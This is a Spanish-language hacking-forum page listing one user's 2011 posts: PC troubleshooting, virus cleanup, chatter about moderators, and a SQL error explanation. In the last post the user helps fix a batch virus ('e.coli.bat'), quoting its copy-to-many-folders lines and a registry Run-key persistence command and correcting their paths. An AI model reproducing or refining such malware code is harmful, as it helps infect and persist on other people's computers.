elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 ... 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 [113] 114 115 116 117 118
1121  Foros Generales / Dudas Generales / Re: Escritorio remoto de conexion inversa? en: 25 Junio 2011, 23:53 pm
Código:
Necesito un escritorio remoto de conexion inversa =<
Diras un troyano de conexion inversa :P
1122  Seguridad Informática / Seguridad / Re: Problemas en conectividad a internet en: 25 Junio 2011, 20:21 pm
Código:
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [Skytel] Skytel.exe
O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKLM\..\Run: [ZSSnp211] C:\Windows\ZSSnp211.exe
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [IDMan] C:\Program Files\Internet Download Manager\IDMan.exe /onboot
hola Sr.Blanco quieres que tede un consejo tienes munchos programas que se ejecutan al inicio, nose si tenga que ver con el internet pero yo en mi persona nomas tengo 2 aplicaciones al inicio eso alenta la pc
1-el antivirus
2-el ctfmon que es de windows(que si lo borras se buelbe a poner)
eliminalas aver que pasa e investiga si son de windows o aplicaciones que tienes instaladas(pero crea una copia por si las dudas anotalas en un editor)
1123  Sistemas Operativos / Windows / Re: ayuda para reparar el modo aprueba de fallo en: 25 Junio 2011, 18:37 pm
Código:
si realmente era un virus lo que eliminaste y se hacía pasar por ese driver 
si hera un virus como digo y estoy 100% seguro de eso
Código:
Te recomiendo que cambies de antivirus.
el avast free es buen antivirus me a funsionado muy bien, el problema de que me infecte fue intensional yo lo proboque a apage el avast y ledi doble click al virus yo lo proboque para que, para saber si lo podia quitar manualmente  ;D ;D y si pude junto con el avast
Código:
reinstala windows desde el mismo cs, no cambiará ninguna preferencia personal o archivo, solo los del sistema.
bueno señores el problema ya quedo resuelto ya puedo entrar a modo de pruebas de fallos como, segui el consejo de WHK tube que insertar el cd de windows y ledi instalar configuracion avanzada (la configuracion recomendada no) y segui los pasos luego se reinicio me aparecio un menu instalar windows o entrar a windows ledi instalar y entro como si ubira arrancado del cd me aparecio la pantalla azul y me desia instalar windows presione ENTRAR o reparar desde consola presione R, ledi entrar y luego en las siguientes opsiones ledi reparar y segui las instruciones y listo
fue casi igual que formatear todo pero sin borrar

bueno gracias atodos por ayudar

saludos de Flamer ;D ;D
1124  Sistemas Operativos / Windows / Re: ayuda para reparar el modo aprueba de fallo en: 25 Junio 2011, 06:32 am
Código:
Intentaste hacer lo que te mensioné?

Saludos
ya intente lo que dises UND3R fuy con un primo busque el archivo y no lo encontre
ledi inicio buscar y nada lo busque como archivo de sistema y nada
Código:
Podrías tomar el archivo que se utiliza para cargar tal modo desde el cd de windows
en el cd de windows no viene tampoco
seguire buscando en la pc de mi primo otro dia gracias por contestar
si hay mas soluciones bien benidas

saludos :P
1125  Sistemas Operativos / Windows / Re: ayuda para reparar el modo aprueba de fallo en: 25 Junio 2011, 05:51 am
Código:
y q archivo dice que falta? ._.
es el archivo "sptd.sys"
1126  Sistemas Operativos / Windows / ayuda para reparar el modo aprueba de fallo en: 24 Junio 2011, 22:34 pm
Hola señores en este dia fui infectado por un virus llamado Win32:Kukacka el cual ya logre quitar con el antivirus(avast) y un poco de manualidades mias el problema es que resulta que no puedo entrar a modo seguro(modo apruebas de fallos) le doy F8 y enpiesa a cargar pero luego dise que falta un archivo y se reinicia la pc ya meti el cd de windows y le di reparar por consola pero no entiendo como aserle desde ahi para delante
es windows xp sp2, bueno gracias por escuchar y hojala me puedan ayudar

saludos By Flamer ::)
1127  Foros Generales / Sugerencias y dudas sobre el Foro / Re: ¿Que opinas sobre los moderadores y colaboradores? en: 21 Junio 2011, 01:53 am
hola pitoloko esta chilo el post bueno te boy adesir aquien admiro y mi historia

el primero que admiro es al Brujo por poner esta web y ya una ves me contesto en un tema, que cuando al abrir la pagina y veo que me contesto el me asombre ;-)
 
el segundo a Novlucker que me a ayudado y como dises si sabe muncho 100% un dios ;-)

el tersero Karcrack que ya me contesto en un tema tambien

y a todos los moderadores, quisiera saber lo que ellos saben pero el moderador expesial para mi y que por el me registre en esta pagina es Hendrix, me gusto muncho su crackme (que logre crackearlo) y el tutorial de creacion de worm.
yo soy un lammber no se muncho de hacker,y no me gusta hacer daños.
cuando baje ese crackme yo no estaba registrado, pero entremas me adentraba en el crackme mas queria saber de hendrix y como lo habia hecho, y revisaba la lista de ganadores y mas me aguitaba y me preguntaba como lo abian logrado, bueno Sinceramente dure tiempo para lograrlo no quiero decir cuanto por que se reirian yo en aquel tiempo no sabia casi nada y desidi registrarme.
mi registro fue como el 2006 no habia partisipado tanto como a hora por falta de internet y dinero, desde que me registre nunca me he topado con el y hace rato revise sus mensajes y no postea desde enero me parece, ya que me registre en pese a conocer a los demas moderadores y los felisito a todos
y un saludo donde quieras que estes hendrix que por ti estoy en este foro y por una amiga que me dijo te boy a hackear el correo, esa palabra fue la que me en rolo en esto

saludos amiga(de aspecto china) que no la he logrado ver desde un tiempal
saludos hendrix reportate
1128  Seguridad Informática / Bugs y Exploits / Re: ¿Que significa esto? en: 19 Junio 2011, 23:28 pm
Código:
User 'jml1q9oruf7' has exceeded the 'max_questions' resource (current value: 75000) SQL=INSERT INTO `jos_session` (`session_id`, `client_id`, `time`) VALUES ('0d20c64b0ee21fea563d49029a76a122', 0, 1308502234)
que el usuario (que esta cifrado) ha exedido el maximo de recursos
si es que mi ingles no me falla, es lo mismo que dijo Shell Root
con los escaneos que le hisistes te nego el servisio el servidor por un momento
ya que esos programas hacen munchas petisiones
Código:
Esto quizás pueda causar un DDoS
si pero si el servidor esta protegido no mas niega el servisio y listo no creo que
tumbe la pagina y si no esta protegida la tumbarias

bueno eso es lo que yo se con lo poco que he leido(lee mas jajajaj)
1129  Comunicaciones / Mensajería / Re: ayuda mandar mail con outlook servidor smtp y pop3 en: 17 Junio 2011, 21:24 pm
gracias por responder el-brujo es un privilegio que me escucharas y respondieras
y como dises tengo que tener una cuenta de correo, antes de que me contestaras
ya andaba buscando y encontre que tengo que crear una cuenta en gmail(puede ser otras pero yo elegi gmail) y configurar outlook para mandar y resibir mail

gracias y saludos  el-brujo 

       By Flamer
1130  Programación / Scripting / Re: virus informatico llamado e.coli.bat en: 17 Junio 2011, 18:47 pm
Código:
%HH% "%windir%\e.coli_b.exe"
%HH% "%systemroot%\system32\e.coli_c.exe"
%HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
%HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
%HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
%HH% "%programfiles%\Winamp\e.coli_f.exe"
%HH% "%programfiles%\WinRAR\e.coli_g.exe"
%HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
%HH% "%programfiles%\shARES\e.coli_i.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
%HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
hola si no tienes privilegios de administrador esto no te funciona
ni esto
Código:
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
y pienso que esta linea te marcaria error
Código:
%HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
lo tendrias que poner asi
Código:
%HH% "%userprofile%\Mis documentos\e.coli_n.exe"
y ejecutarlo en la unidad %systemdrive% que porlo general es la unidad c:
Páginas: 1 ... 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 [113] 114 115 116 117 118
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines